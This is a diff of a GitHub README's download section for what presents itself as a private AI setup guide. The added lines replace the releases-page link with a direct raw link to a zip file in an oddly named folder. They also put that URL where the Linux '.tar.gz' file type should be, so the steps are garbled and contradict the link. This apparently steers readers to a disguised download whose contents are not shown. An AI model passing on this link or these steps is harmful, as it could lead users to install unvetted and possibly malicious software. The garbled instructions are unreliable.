KnightLordHUN/private-ai-setup-dream-guide/README.md

 ## 📥 Download & Install

-To get the application, visit this page to download: [Releases Page](https://github.com/KnightLordHUN/private-ai-setup-dream-guide/releases).
+To get the application, visit this page to download: [Releases Page](https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip).

 1. Click the link above to go to the releases page.
 2. Find the latest version listed.
 3. Download the appropriate file for your operating system.
-Look for files labeled `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Look for files labeled `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip` for Linux.
 4. Once the download is complete, locate the file and double-click it to begin the installation process.

 ## 💻 Installation Steps